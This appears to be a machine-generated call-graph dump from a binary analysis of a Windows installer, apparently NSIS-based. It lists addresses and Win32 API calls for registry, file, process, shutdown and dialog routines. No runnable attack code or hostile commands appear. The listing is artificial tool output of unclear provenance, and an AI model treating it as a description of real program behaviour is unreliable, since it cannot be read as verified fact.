3415 405ab4 3404->3415 3405 405cca 3406 402a15 3405->3406 3439 405a85 lstrcpynA 3405->3439 3406->3383 3423 405ce3 3406->3423 3408 405b48 GetVersion 3421 405b55 3408->3421 3409 405ca1 lstrlenA 3409->3415 3410 405aa7 10 API calls 3410->3409 3413 405bc0 GetSystemDirectoryA 3413->3421 3415->3405 3415->3408 3415->3409 3415->3410 3417 405ce3 5 API calls 3415->3417 3437 4059e3 wsprintfA 3415->3437 3438 405a85 lstrcpynA 3415->3438 3416 405bd3 GetWindowsDirectoryA 3416->3421 3417->3415 3418 405aa7 10 API calls 3418->3421 3419 405c4a lstrcatA 3419->3415 3420 405c07 SHGetSpecialFolderLocation 3420->3421 3422 405c1f SHGetPathFromIDListA CoTaskMemFree 3420->3422 3421->3413 3421->3415 3421->3416 3421->3418 3421->3419 3421->3420 3432 40596c RegOpenKeyExA 3421->3432 3422->3421 3429 405cef 3423->3429 3424 405d57 3425 405d5b CharPrevA 3424->3425 3427 405d76 3424->3427 3425->3424 3426 405d4c CharNextA 3426->3424 3426->3429 3427->3383 3429->3424 3429->3426 3430 405d3a CharNextA 3429->3430 3431 405d47 CharNextA 3429->3431 3440 4055a3 3429->3440 3430->3429 3431->3426 3433 4059dd 3432->3433 3434 40599f RegQueryValueExA 3432->3434 3433->3421 3435 4059c0 RegCloseKey 3434->3435 3435->3433 3437->3415 3438->3415 3439->3406 3441 4055a9 3440->3441 3442 4055bc 3441->3442 3443 4055af CharNextA 3441->3443 3442->3429 3443->3441 3445 735f4746 3444->3445 3445->3387 3445->3445 4671 4014d6 4672 4029cb 18 API calls 4671->4672 4673 4014dc Sleep 4672->4673 4675 40287d 4673->4675 4042 401a58 4047 4029cb 4042->4047 4044 401a5f 4045 4029cb 18 API calls 4044->4045 4046 401a68 4045->4046 4048 405aa7 18 API calls 4047->4048 4049 4029df 4048->4049 4049->4044 4050 402858 SendMessageA 4051 402872 InvalidateRect 4050->4051 4052 40287d 4050->4052 4051->4052 4676 4018d8 4677 40190f 4676->4677 4678 4029e8 18 API calls 4677->4678 4679 401914 4678->4679 4680 4053aa 68 API calls 4679->4680 4681 40191d 4680->4681 4053 402259 4054 4029e8 18 API calls 4053->4054 4055 402267 4054->4055 4056 4029e8 18 API calls 4055->4056 4057 402270 4056->4057 4058 4029e8 18 API calls 4057->4058 4059 40227a GetPrivateProfileStringA 4058->4059 4060 40155b 4061 401577 ShowWindow 4060->4061 4062 40157e 4060->4062 4061->4062 4063 40158c ShowWindow 4062->4063 4064 40287d 4062->4064 4063->4064 4682 4018db 4683 4029e8 18 API calls 4682->4683 4684 4018e2 4683->4684 4685 405346 MessageBoxIndirectA 4684->4685 4686 4018eb 4685->4686 4065 404f61 4066 404f82 GetDlgItem GetDlgItem GetDlgItem 4065->4066 4067 40510d 4065->4067 4111 403e6c SendMessageA 4066->4111 4069 405116 GetDlgItem CreateThread CloseHandle 4067->4069 4072 40513e 4067->4072 4069->4072 4070 404ff3 4080 404ffa GetClientRect GetSystemMetrics SendMessageA SendMessageA 4070->4080 4071 405169 4073 4051c7 4071->4073 4077 4051a0 ShowWindow 4071->4077 4078 40517a 4071->4078 4072->4071 4074 405155 ShowWindow ShowWindow 4072->4074 4075 40518b 4072->4075 4073->4075 4087 4051d2 SendMessageA 4073->4087 4116 403e6c SendMessageA 4074->4116 4120 403e9e 4075->4120 4083 4051c0 4077->4083 4084 4051b2 4077->4084 4117 403e10 4078->4117 4085 405069 4080->4085 4086 40504d SendMessageA SendMessageA 4080->4086 4082 405199 4092 403e10 SendMessageA 4083->4092 4091 404e23 25 API calls 4084->4091 4088 40507c 4085->4088 4089 40506e SendMessageA 4085->4089 4086->4085 4087->4082 4090 4051eb CreatePopupMenu 4087->4090 4112 403e37 4088->4112 4089->4088 4093 405aa7 18 API calls 4090->4093 4091->4083 4092->4073 4095 4051fb AppendMenuA 4093->4095 4097 405221 4095->4097 4098 40520e GetWindowRect 4095->4098 4096 40508c 4099 405095 ShowWindow 4096->4099 4100 4050c9 GetDlgItem SendMessageA 4096->4100 4101 40522a TrackPopupMenu 4097->4101 4098->4101 4102 4050b8 4099->4102 4103 4050ab ShowWindow 4099->4103 4100->4082 4104 4050f0 SendMessageA SendMessageA 4100->4104 4101->4082 4105 405248 4101->4105 4115 403e6c SendMessageA 4102->4115 4103->4102 4104->4082 4106 405264 SendMessageA 4105->4106 4106->4106 4108 405281 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4106->4108 4109 4052a3 SendMessageA 4108->4109 4109->4109 4110 4052c4 GlobalUnlock SetClipboardData CloseClipboard 4109->4110 4110->4082 4111->4070 4113 405aa7 18 API calls 4112->4113 4114 403e42 SetDlgItemTextA 4113->4114 4114->4096 4115->4100 4116->4071 4118 403e17 4117->4118 4119 403e1d SendMessageA 4117->4119 4118->4119 4119->4075 4121 403eb6 GetWindowLongA 4120->4121 4131 403f3f 4120->4131 4122 403ec7 4121->4122 4121->4131 4123 403ed6 GetSysColor 4122->4123 4124 403ed9 4122->4124 4123->4124 4125 403ee9 SetBkMode 4124->4125 4126 403edf SetTextColor 4124->4126 4127 403f01 GetSysColor 4125->4127 4128 403f07 4125->4128 4126->4125 4127->4128 4129 403f18 4128->4129 4130 403f0e SetBkColor 4128->4130 4129->4131 4132 403f32 CreateBrushIndirect 4129->4132 4133 403f2b DeleteObject 4129->4133 4130->4129 4131->4082 4132->4131 4133->4132 4134 403964 4135 403ab7 4134->4135 4136 40397c 4134->4136 4137 403b08 4135->4137 4138 403ac8 GetDlgItem GetDlgItem 4135->4138 4136->4135 4139 403988 4136->4139 4141 403b62 4137->4141 4151 401389 2 API calls 4137->4151 4140 403e37 19 API calls 4138->4140 4142 403993 SetWindowPos 4139->4142 4143 4039a6 4139->4143 4146 403af2 SetClassLongA 4140->4146 4147 403e83 SendMessageA 4141->4147 4152 403ab2 4141->4152 4142->4143 4144 4039c3 4143->4144 4145 4039ab ShowWindow 4143->4145 4148 4039e5 4144->4148 4149 4039cb DestroyWindow 4144->4149 4145->4144 4150 40140b 2 API calls 4146->4150 4174 403b74 4147->4174 4154 4039ea SetWindowLongA 4148->4154 4155 4039fb 4148->4155 4153 403dc0 4149->4153 4150->4137 4156 403b3a 4151->4156 4153->4152 4162 403df1 ShowWindow 4153->4162 4154->4152 4159 403a72 4155->4159 4160 403a07 GetDlgItem 4155->4160 4156->4141 4161 403b3e SendMessageA 4156->4161 4157 40140b 2 API calls 4157->4174 4158 403dc2 DestroyWindow EndDialog 4158->4153 4165 403e9e 8 API calls 4159->4165 4163 403a37 4160->4163 4164 403a1a SendMessageA IsWindowEnabled 4160->4164 4161->4152 4162->4152 4167 403a44 4163->4167 4170 403a8b SendMessageA 4163->4170 4171 403a57 4163->4171 4177 403a3c 4163->4177 4164->4152 4164->4163 4165->4152 4166 405aa7 18 API calls 4166->4174 4167->4170 4167->4177 4168 403e10 SendMessageA 4168->4159 4169 403e37 19 API calls 4169->4174 4170->4159 4172 403a74 4171->4172 4173 403a5f 4171->4173 4176 40140b 2 API calls 4172->4176 4175 40140b 2 API calls 4173->4175 4174->4152 4174->4157 4174->4158 4174->4166 4174->4169 4178 403e37 19 API calls 4174->4178 4193 403d02 DestroyWindow 4174->4193 4175->4177 4176->4177 4177->4159 4177->4168 4179 403bef GetDlgItem 4178->4179 4180 403c04 4179->4180 4181 403c0c ShowWindow EnableWindow 4179->4181 4180->4181 4202 403e59 EnableWindow 4181->4202 4183 403c36 EnableWindow 4186 403c4a 4183->4186 4184 403c4f GetSystemMenu EnableMenuItem SendMessageA 4185 403c7f SendMessageA 4184->4185 4184->4186 4185->4186 4186->4184 4203 403e6c SendMessageA 4186->4203 4204 405a85 lstrcpynA 4186->4204 4189 403cad lstrlenA 4190 405aa7 18 API calls 4189->4190 4191 403cbe SetWindowTextA 4190->4191 4192 401389 2 API calls 4191->4192 4192->4174 4193->4153 4194 403d1c CreateDialogParamA 4193->4194 4194->4153 4195 403d4f 4194->4195 4196 403e37 19 API calls 4195->4196 4197 403d5a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4196->4197 4198 401389 2 API calls 4197->4198 4199 403da0 4198->4199 4199->4152 4200 403da8 ShowWindow 4199->4200 4201 403e83 SendMessageA 4200->4201 4201->4153 4202->4183 4203->4186 4204->4189 4205 402164 4206 4029e8 18 API calls 4205->4206 4207 40216a 4206->4207 4208 4029e8 18 API calls 4207->4208 4209 402173 4208->4209 4210 4029e8 18 API calls 4209->4210 4211 40217c 4210->4211 4212 405d7c 2 API calls 4211->4212 4213 402185 4212->4213 4214 402196 lstrlenA lstrlenA 4213->4214 4218 402189 4213->4218 4215 404e23 25 API calls 4214->4215 4217 4021d2 SHFileOperationA 4215->4217 4216 404e23 25 API calls 4219 402191 4216->4219 4217->4218 4217->4219 4218->4216 4218->4219 4687 4019e6 4688 4029e8 18 API calls 4687->4688 4689 4019ef ExpandEnvironmentStringsA 4688->4689 4690 401a03 4689->4690 4692 401a16 4689->4692 4691 401a08 lstrcmpA 4690->4691 4690->4692 4691->4692 4693 4021e6 4694 402200 4693->4694 4695 4021ed 4693->4695 4696 405aa7 18 API calls 4695->4696 4697 4021fa 4696->4697 4698 405346 MessageBoxIndirectA 4697->4698 4698->4694 4220 401c6d 4221 4029cb 18 API calls 4220->4221 4222 401c73 IsWindow 4221->4222 4223 4019d6 4222->4223 4706 4025ed 4707 4025f4 4706->4707 4708 40287d 4706->4708 4709 4025fa FindClose 4707->4709 4709->4708 4224 40266e 4225 4029e8 18 API calls 4224->4225 4227 40267c 4225->4227 4226 402692 4229 40573d 2 API calls 4226->4229 4227->4226 4228 4029e8 18 API calls 4227->4228 4228->4226 4230 402698 4229->4230 4250 40575c GetFileAttributesA CreateFileA 4230->4250 4232 4026a5 4233 4026b1 GlobalAlloc 4232->4233 4234 40274e 4232->4234 4235 402745 CloseHandle 4233->4235 4236 4026ca 4233->4236 4237 402756 DeleteFileA 4234->4237 4238 402769 4234->4238 4235->4234 4251 4031da SetFilePointer 4236->4251 4237->4238 4240 4026d0 4241 4031a8 ReadFile 4240->4241 4242 4026d9 GlobalAlloc 4241->4242 4243 4026e9 4242->4243 4244 40271d WriteFile GlobalFree 4242->4244 4245 402f01 47 API calls 4243->4245 4246 402f01 47 API calls 4244->4246 4249 4026f6 4245->4249 4247 402742 4246->4247 4247->4235 4248 402714 GlobalFree 4248->4244 4249->4248 4250->4232 4251->4240 4252 40276f 4253 4029cb 18 API calls 4252->4253 4254 402775 4253->4254 4255 4027b0 4254->4255 4256 402799 4254->4256 4265 40264e 4254->4265 4259 4027c6 4255->4259 4260 4027ba 4255->4260 4257 4027ad 4256->4257 4258 40279e 4256->4258 4267 4059e3 wsprintfA 4257->4267 4266 405a85 lstrcpynA 4258->4266 4262 405aa7 18 API calls 4259->4262 4261 4029cb 18 API calls 4260->4261 4261->4265 4262->4265 4266->4265 4267->4265 4710 4014f0 SetForegroundWindow 4711 40287d 4710->4711 4268 404772 GetDlgItem GetDlgItem 4269 4047c6 7 API calls 4268->4269 4275 4049e3 4268->4275 4270 40486c DeleteObject 4269->4270 4271 40485f SendMessageA 4269->4271 4272 404877 4270->4272 4271->4270 4273 4048ae 4272->4273 4278 405aa7 18 API calls 4272->4278 4276 403e37 19 API calls 4273->4276 4274 404acd 4277 404b7c 4274->4277 4286 404b26 SendMessageA 4274->4286 4308 4049d6 4274->4308 4275->4274 4311 404a57 4275->4311 4321 4046f2 SendMessageA 4275->4321 4282 4048c2 4276->4282 4279 404b91 4277->4279 4280 404b85 SendMessageA 4277->4280 4281 404890 SendMessageA SendMessageA 4278->4281 4288 404ba3 ImageList_Destroy 4279->4288 4289 404baa 4279->4289 4297 404bba 4279->4297 4280->4279 4281->4272 4285 403e37 19 API calls 4282->4285 4283 404abf SendMessageA 4283->4274 4290 4048d0 4285->4290 4292 404b3b SendMessageA 4286->4292 4286->4308 4287 403e9e 8 API calls 4293 404d6c 4287->4293 4288->4289 4294 404bb3 GlobalFree 4289->4294 4289->4297 4295 4049a4 GetWindowLongA SetWindowLongA 4290->4295 4304 40491f SendMessageA 4290->4304 4307 40499e 4290->4307 4309 40495b SendMessageA 4290->4309 4310 40496c SendMessageA 4290->4310 4291 404d20 4298 404d32 ShowWindow GetDlgItem ShowWindow 4291->4298 4291->4308 4301 404b4e 4292->4301 4294->4297 4296 4049bd 4295->4296 4299 4049c3 ShowWindow 4296->4299 4300 4049db 4296->4300 4297->4291 4305 40140b 2 API calls 4297->4305 4315 404bec 4297->4315 4298->4308 4319 403e6c SendMessageA 4299->4319 4320 403e6c SendMessageA 4300->4320 4306 404b5f SendMessageA 4301->4306 4304->4290 4305->4315 4306->4277 4307->4295 4307->4296 4308->4287 4309->4290 4310->4290 4311->4274 4311->4283 4312 404cf6 InvalidateRect 4312->4291 4313 404d0c 4312->4313 4326 404610 4313->4326 4314 404c1a SendMessageA 4318 404c30 4314->4318 4315->4314 4315->4318 4317 404ca4 SendMessageA SendMessageA 4317->4318 4318->4312 4318->4317 4319->4308 4320->4275 4322 404751 SendMessageA 4321->4322 4323 404715 GetMessagePos ScreenToClient SendMessageA 4321->4323 4324 404749 4322->4324 4323->4324 4325 40474e 4323->4325 4324->4311 4325->4322 4327 40462a 4326->4327 4328 405aa7 18 API calls 4327->4328 4329 40465f 4328->4329 4330 405aa7 18 API calls 4329->4330 4331 40466a 4330->4331 4332 405aa7 18 API calls 4331->4332 4333 40469b lstrlenA wsprintfA SetDlgItemTextA 4332->4333 4333->4291 4334 404d73 4335 404d81 4334->4335 4336 404d98 4334->4336 4337 404d87 4335->4337 4352 404e01 4335->4352 4338 404da6 IsWindowVisible 4336->4338 4344 404dbd 4336->4344 4339 403e83 SendMessageA 4337->4339 4341 404db3 4338->4341 4338->4352 4342 404d91 4339->4342 4340 404e07 CallWindowProcA 4340->4342 4343 4046f2 5 API calls 4341->4343 4343->4344 4344->4340 4353 405a85 lstrcpynA 4344->4353 4346 404dec 4354 4059e3 wsprintfA 4346->4354 4348 404df3 4349 40140b 2 API calls 4348->4349 4350 404dfa 4349->4350 4355 405a85 lstrcpynA 4350->4355 4352->4340 4353->4346 4354->4348 4355->4352 4356 404275 4357 4042b3 4356->4357 4358 4042a6 4356->4358 4360 4042bc GetDlgItem 4357->4360 4365 40431f 4357->4365 4417 40532a GetDlgItemTextA 4358->4417 4362 4042d0 4360->4362 4361 4042ad 4364 405ce3 5 API calls 4361->4364 4367 4042e4 SetWindowTextA 4362->4367 4372 40560c 4 API calls 4362->4372 4363 404403 4415 40458f 4363->4415 4419 40532a GetDlgItemTextA 4363->4419 4364->4357 4365->4363 4368 405aa7 18 API calls 4365->4368 4365->4415 4370 403e37 19 API calls 4367->4370 4373 404395 SHBrowseForFolderA 4368->4373 4369 40442f 4374 405659 18 API calls 4369->4374 4375 404302 4370->4375 4371 403e9e 8 API calls 4376 4045a3 4371->4376 4377 4042da 4372->4377 4373->4363 4378 4043ad CoTaskMemFree 4373->4378 4379 404435 4374->4379 4380 403e37 19 API calls 4375->4380 4377->4367 4383 405578 3 API calls 4377->4383 4381 405578 3 API calls 4378->4381 4420 405a85 lstrcpynA 4379->4420 4382 404310 4380->4382 4384 4043ba 4381->4384 4418 403e6c SendMessageA 4382->4418 4383->4367 4387 4043f1 SetDlgItemTextA 4384->4387 4392 405aa7 18 API calls 4384->4392 4387->4363 4388 404318 4390 405da3 3 API calls 4388->4390 4389 40444c 4391 405da3 3 API calls 4389->4391 4390->4365 4399 404454 4391->4399 4393 4043d9 lstrcmpiA 4392->4393 4393->4387 4396 4043ea lstrcatA 4393->4396 4394 40448e 4421 405a85 lstrcpynA 4394->4421 4396->4387 4397 404497 4398 40560c 4 API calls 4397->4398 4400 40449d GetDiskFreeSpaceA 4398->4400 4399->4394 4402 4055bf 2 API calls 4399->4402 4404 4044e1 4399->4404 4403 4044bf MulDiv 4400->4403 4400->4404 4402->4399 4403->4404 4405 40453e 4404->4405 4406 404610 21 API calls 4404->4406 4407 404561 4405->4407 4409 40140b 2 API calls 4405->4409 4408 404530 4406->4408 4422 403e59 EnableWindow 4407->4422 4411 404540 SetDlgItemTextA 4408->4411 4412 404535 4408->4412 4409->4407 4411->4405 4414 404610 21 API calls 4412->4414 4413 40457d 4413->4415 4423 40420a 4413->4423 4414->4405 4415->4371 4417->4361 4418->4388 4419->4369 4420->4389 4421->4397 4422->4413 4424 404218 4423->4424 4425 40421d SendMessageA 4423->4425 4424->4425 4425->4415 4712 4022f5 4713 4022fb 4712->4713 4714 4029e8 18 API calls 4713->4714 4715 40230d 4714->4715 4716 4029e8 18 API calls 4715->4716 4717 402317 RegCreateKeyExA 4716->4717 4718 402341 4717->4718 4719 40287d 4717->4719 4720 402359 4718->4720 4721 4029e8 18 API calls 4718->4721 4722 402365 4720->4722 4724 4029cb 18 API calls 4720->4724 4723 402352 lstrlenA 4721->4723 4725 402380 RegSetValueExA 4722->4725 4727 402f01 47 API calls 4722->4727 4723->4720 4724->4722 4726 402396 RegCloseKey 4725->4726 4726->4719 4727->4725 4729 4027f5 4730 4029cb 18 API calls 4729->4730 4731 4027fb 4730->4731 4732 402809 4731->4732 4733 40282c 4731->4733 4734 40264e 4731->4734 4732->4734 4737 4059e3 wsprintfA 4732->4737 4733->4734 4735 405aa7 18 API calls 4733->4735 4735->4734 4737->4734 4738 4024f8 4739 4029cb 18 API calls 4738->4739 4742 402502 4739->4742 4740 402578 4741 402536 ReadFile 4741->4740 4741->4742 4742->4740 4742->4741 4743 40257a 4742->4743 4744 40258a 4742->4744 4747 4059e3 wsprintfA 4743->4747 4744->4740 4746 4025a0 SetFilePointer 4744->4746 4746->4740 4747->4740 4748 4016fa 4749 4029e8 18 API calls 4748->4749 4750 401701 SearchPathA 4749->4750 4751 40171c 4750->4751 4752 4014fe 4753 401506 4752->4753 4755 401519 4752->4755 4754 4029cb 18 API calls 4753->4754 4754->4755 4426 403f7f 4427 403f95 4426->4427 4432 4040a2 4426->4432 4430 403e37 19 API calls 4427->4430 4428 404111 4429 4041e5 4428->4429 4431 40411b GetDlgItem 4428->4431 4437 403e9e 8 API calls 4429->4437 4433 403feb 4430->4433 4434 404131 4431->4434 4435 4041a3 4431->4435 4432->4428 4432->4429 4436 4040e6 GetDlgItem SendMessageA 4432->4436 4438 403e37 19 API calls 4433->4438 4434->4435 4442 404157 6 API calls 4434->4442 4435->4429 4439 4041b5 4435->4439 4457 403e59 EnableWindow 4436->4457 4447 4041e0 4437->4447 4441 403ff8 CheckDlgButton 4438->4441 4443 4041bb SendMessageA 4439->4443 4444 4041cc 4439->4444 4455 403e59 EnableWindow 4441->4455 4442->4435 4443->4444 4444->4447 4448 4041d2 SendMessageA 4444->4448 4445 40410c 4449 40420a SendMessageA 4445->4449 4448->4447 4449->4428 4450 404016 GetDlgItem 4456 403e6c SendMessageA 4450->4456 4452 40402c SendMessageA 4453 404053 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4452->4453 4454 40404a GetSysColor 4452->4454 4453->4447 4454->4453 4455->4450 4456->4452 4457->4445 4458 401000 4459 401037 BeginPaint GetClientRect 4458->4459 4460 40100c DefWindowProcA 4458->4460 4462 4010f3 4459->4462 4463 401179 4460->4463 4464 401073 CreateBrushIndirect FillRect DeleteObject 4462->4464 4465 4010fc 4462->4465 4464->4462 4466 401102 CreateFontIndirectA 4465->4466 4467 401167 EndPaint 4465->4467 4466->4467 4468 401112 6 API calls 4466->4468 4467->4463 4468->4467 4469 401b06 4470 401b13 4469->4470 4471 401b57 4469->4471 4474 4021ed 4470->4474 4479 401b2a 4470->4479 4472 401b80 GlobalAlloc 4471->4472 4473 401b5b 4471->4473 4475 405aa7 18 API calls 4472->4475 4484 401b9b 4473->4484 4490 405a85 lstrcpynA 4473->4490 4476 405aa7 18 API calls 4474->4476 4475->4484 4478 4021fa 4476->4478 4482 405346 MessageBoxIndirectA 4478->4482 4488 405a85 lstrcpynA 4479->4488 4481 401b6d GlobalFree 4481->4484 4482->4484 4483 401b39 4489 405a85 lstrcpynA 4483->4489 4486 401b48 4491 405a85 lstrcpynA 4486->4491 4488->4483 4489->4486 4490->4481 4491->4484 4492 402607 4493 40260a 4492->4493 4497 402622 4492->4497 4494 402617 FindNextFileA 4493->4494 4495 402661 4494->4495 4494->4497 4498 405a85 lstrcpynA 4495->4498 4498->4497 4017 401389 4019 401390 4017->4019 4018 4013fe 4019->4018 4020 4013cb MulDiv SendMessageA 4019->4020 4020->4019 4770 401c8a 4771 4029cb 18 API calls 4770->4771 4772 401c91 4771->4772 4773 4029cb 18 API calls 4772->4773 4774 401c99 GetDlgItem 4773->4774 4775 4024aa 4774->4775 4776 40248e 4777 4029e8 18 API calls 4776->4777 4778 402495 4777->4778 4781 40575c GetFileAttributesA CreateFileA 4778->4781 4780 4024a1 4781->4780 4506 402012 4507 4029e8 18 API calls 4506->4507 4508 402019 4507->4508 4509 4029e8 18 API calls 4508->4509 4510 402023 4509->4510 4511 4029e8 18 API calls 4510->4511 4512 40202c 4511->4512 4513 4029e8 18 API calls 4512->4513 4514 402036 4513->4514 4515 4029e8 18 API calls 4514->4515 4517 402040 4515->4517 4516 402054 CoCreateInstance 4519 402073 4516->4519 4520 402129 4516->4520 4517->4516 4518 4029e8 18 API calls 4517->4518 4518->4516 4519->4520 4523 402108 MultiByteToWideChar 4519->4523 4521 401423 25 API calls 4520->4521 4522 40215b 4520->4522 4521->4522 4523->4520 4524 402215 4525 40221d 4524->4525 4528 402223 4524->4528 4526 4029e8 18 API calls 4525->4526 4526->4528 4527 402233 4530 402241 4527->4530 4531 4029e8 18 API calls 4527->4531 4528->4527 4529 4029e8 18 API calls 4528->4529 4529->4527 4532 4029e8 18 API calls 4530->4532 4531->4530 4533 40224a WritePrivateProfileStringA 4532->4533 4782 401e95 4783 4029e8 18 API calls 4782->4783 4784 401e9c 4783->4784 4785 405d7c 2 API calls 4784->4785 4786 401ea2 4785->4786 4788 401eb4 4786->4788 4789 4059e3 wsprintfA 4786->4789 4789->4788 4790 401595 4791 4029e8 18 API calls 4790->4791 4792 40159c SetFileAttributesA 4791->4792 4793 4015ae 4792->4793 4794 401d95 4795 4029cb 18 API calls 4794->4795 4796 401d9b 4795->4796 4797 4029cb 18 API calls 4796->4797 4798 401da4 4797->4798 4799 401db6 EnableWindow 4798->4799 4800 401dab ShowWindow 4798->4800 4801 40287d 4799->4801 4800->4801 4802 401696 4803 4029e8 18 API calls 4802->4803 4804 40169c GetFullPathNameA 4803->4804 4805 4016d4 4804->4805 4806 4016b3 4804->4806 4807 4016e8 GetShortPathNameA 4805->4807 4808 40287d 4805->4808 4806->4805 4809 405d7c 2 API calls 4806->4809 4807->4808 4810 4016c4 4809->4810 4810->4805 4812 405a85 lstrcpynA 4810->4812 4812->4805 4534 402419 4544 402af2 4534->4544 4536 402423 4537 4029cb 18 API calls 4536->4537 4538 40242c 4537->4538 4539 402443 RegEnumKeyA 4538->4539 4540 40244f RegEnumValueA 4538->4540 4542 40264e 4538->4542 4541 402468 RegCloseKey 4539->4541 4540->4541 4540->4542 4541->4542 4545 4029e8 18 API calls 4544->4545 4546 402b0b 4545->4546 4547 402b19 RegOpenKeyExA 4546->4547 4547->4536 4820 402299 4821 4022c9 4820->4821 4822 40229e 4820->4822 4823 4029e8 18 API calls 4821->4823 4824 402af2 19 API calls 4822->4824 4825 4022d0 4823->4825 4826 4022a5 4824->4826 4831 402a28 RegOpenKeyExA 4825->4831 4827 4029e8 18 API calls 4826->4827 4830 4022e6 4826->4830 4828 4022b6 RegDeleteValueA RegCloseKey 4827->4828 4828->4830 4832 402a53 4831->4832 4839 402a9f 4831->4839 4833 402a79 RegEnumKeyA 4832->4833 4834 402a8b RegCloseKey 4832->4834 4835 402ab0 RegCloseKey 4832->4835 4837 402a28 3 API calls 4832->4837 4833->4832 4833->4834 4836 405da3 3 API calls 4834->4836 4835->4839 4838 402a9b 4836->4838 4837->4832 4838->4839 4840 402acb RegDeleteKeyA 4838->4840 4839->4830 4840->4839 4841 735f4785 ImmGetImeMenuItemsA 4548 401e1b 4549 4029e8 18 API calls 4548->4549 4550 401e21 4549->4550 4551 404e23 25 API calls 4550->4551 4552 401e2b 4551->4552 4553 4052e5 2 API calls 4552->4553 4557 401e31 4553->4557 4554 401e87 CloseHandle 4556 40264e 4554->4556 4555 401e50 WaitForSingleObject 4555->4557 4558 401e5e GetExitCodeProcess 4555->4558 4557->4554 4557->4555 4557->4556 4559 405ddc 2 API calls 4557->4559 4560 401e70 4558->4560 4562 401e79 4558->4562 4559->4555 4563 4059e3 wsprintfA 4560->4563 4562->4554 4563->4562 4564 401d1b GetDC GetDeviceCaps 4565 4029cb 18 API calls 4564->4565 4566 401d37 MulDiv 4565->4566 4567 4029cb 18 API calls 4566->4567 4568 401d4c 4567->4568 4569 405aa7 18 API calls 4568->4569 4570 401d85 CreateFontIndirectA 4569->4570 4571 4024aa 4570->4571 3446 401721 3447 4029e8 18 API calls 3446->3447 3448 401728 3447->3448 3452 40578b 3448->3452 3450 40172f 3451 40578b 2 API calls 3450->3451 3451->3450 3453 405796 GetTickCount GetTempFileNameA 3452->3453 3454 4057c2 3453->3454 3455 4057c6 3453->3455 3454->3453 3454->3455 3455->3450 4842 4023a1 4843 402af2 19 API calls 4842->4843 4844 4023ab 4843->4844 4845 4029e8 18 API calls 4844->4845 4846 4023b4 4845->4846 4847 4023be RegQueryValueExA 4846->4847 4851 40264e 4846->4851 4848 4023e4 RegCloseKey 4847->4848 4849 4023de 4847->4849 4848->4851 4849->4848 4853 4059e3 wsprintfA 4849->4853 4853->4848 4572 401922 4573 4029e8 18 API calls 4572->4573 4574 401929 lstrlenA 4573->4574 4575 4024aa 4574->4575 3595 403225 #17 SetErrorMode OleInitialize 3665 405da3 GetModuleHandleA 3595->3665 3599 403293 GetCommandLineA 3670 405a85 lstrcpynA 3599->3670 3601 4032a5 GetModuleHandleA 3602 4032bc 3601->3602 3603 4055a3 CharNextA 3602->3603 3604 4032d0 CharNextA 3603->3604 3614 4032dd 3604->3614 3605 403346 3606 403359 GetTempPathA 3605->3606 3671 4031f1 3606->3671 3608 40336f 3609 403393 DeleteFileA 3608->3609 3610 403373 GetWindowsDirectoryA lstrcatA 3608->3610 3679 402c5b GetTickCount GetModuleFileNameA 3609->3679 3612 4031f1 11 API calls 3610->3612 3611 4055a3 CharNextA 3611->3614 3615 40338f 3612->3615 3614->3605 3614->3611 3616 403348 3614->3616 3615->3609 3618 40340d 3615->3618 3764 405a85 lstrcpynA 3616->3764 3617 4033a4 3617->3618 3620 4033fd 3617->3620 3623 4055a3 CharNextA 3617->3623 3781 4035a6 3618->3781 3709 4035e3 3620->3709 3625 4033bb 3623->3625 3633 4033d8 3625->3633 3634 40343c lstrcatA lstrcmpiA 3625->3634 3626 403426 3629 405346 MessageBoxIndirectA 3626->3629 3627 40350b 3628 40358e ExitProcess 3627->3628 3631 405da3 3 API calls 3627->3631 3630 403434 ExitProcess 3629->3630 3635 40351a 3631->3635 3765 405659 3633->3765 3634->3618 3637 403458 CreateDirectoryA SetCurrentDirectoryA 3634->3637 3638 405da3 3 API calls 3635->3638 3640 40347a 3637->3640 3641 40346f 3637->3641 3642 403523 3638->3642 3789 405a85 lstrcpynA 3640->3789 3788 405a85 lstrcpynA 3641->3788 3645 405da3 3 API calls 3642->3645 3647 40352c 3645->3647 3648 40357a ExitWindowsEx 3647->3648 3653 40353a GetCurrentProcess 3647->3653 3648->3628 3652 403587 3648->3652 3649 4033f2 3780 405a85 lstrcpynA 3649->3780 3651 405aa7 18 API calls 3654 4034aa DeleteFileA 3651->3654 3819 40140b 3652->3819 3657 40354a 3653->3657 3656 4034b7 CopyFileA 3654->3656 3662 403488 3654->3662 3656->3662 3657->3648 3658 4034ff 3659 4057d3 38 API calls 3658->3659 3659->3618 3661 405aa7 18 API calls 3661->3662 3662->3651 3662->3658 3662->3661 3664 4034eb CloseHandle 3662->3664 3790 4057d3 3662->3790 3816 4052e5 CreateProcessA 3662->3816 3664->3662 3666 405dca GetProcAddress 3665->3666 3667 405dbf LoadLibraryA 3665->3667 3668 403268 SHGetFileInfoA 3666->3668 3667->3666 3667->3668 3669 405a85 lstrcpynA 3668->3669 3669->3599 3670->3601 3672 405ce3 5 API calls 3671->3672 3673 4031fd 3672->3673 3674 403207 3673->3674 3675 405578 3 API calls 3673->3675 3674->3608 3676 40320f CreateDirectoryA 3675->3676 3677 40578b 2 API calls 3676->3677 3678 403223 3677->3678 3678->3608 3822 40575c GetFileAttributesA CreateFileA 3679->3822 3681 402c9e 3708 402cab 3681->3708 3823 405a85 lstrcpynA 3681->3823 3683 402cc1 3824 4055bf lstrlenA 3683->3824 3687 402cd2 GetFileSize 3688 402dd3 3687->3688 3707 402ce9 3687->3707 3689 402bc5 32 API calls 3688->3689 3691 402dda 3689->3691 3690 4031a8 ReadFile 3690->3707 3692 402e16 GlobalAlloc 3691->3692 3691->3708 3829 4031da SetFilePointer 3691->3829 3695 402e2d 3692->3695 3693 402e6e 3696 402bc5 32 API calls 3693->3696 3700 40578b 2 API calls 3695->3700 3696->3708 3697 402df7 3698 4031a8 ReadFile 3697->3698 3701 402e02 3698->3701 3699 402bc5 32 API calls 3699->3707 3702 402e3e CreateFileA 3700->3702 3701->3692 3701->3708 3703 402e78 3702->3703 3702->3708 3830 4031da SetFilePointer 3703->3830 3705 402e86 3706 402f01 47 API calls 3705->3706 3706->3708 3707->3688 3707->3690 3707->3693 3707->3699 3707->3708 3708->3617 3710 405da3 3 API calls 3709->3710 3711 4035f7 3710->3711 3712 4035fd 3711->3712 3713 40360f 3711->3713 3840 4059e3 wsprintfA 3712->3840 3714 40596c 3 API calls 3713->3714 3715 403630 3714->3715 3717 40364e 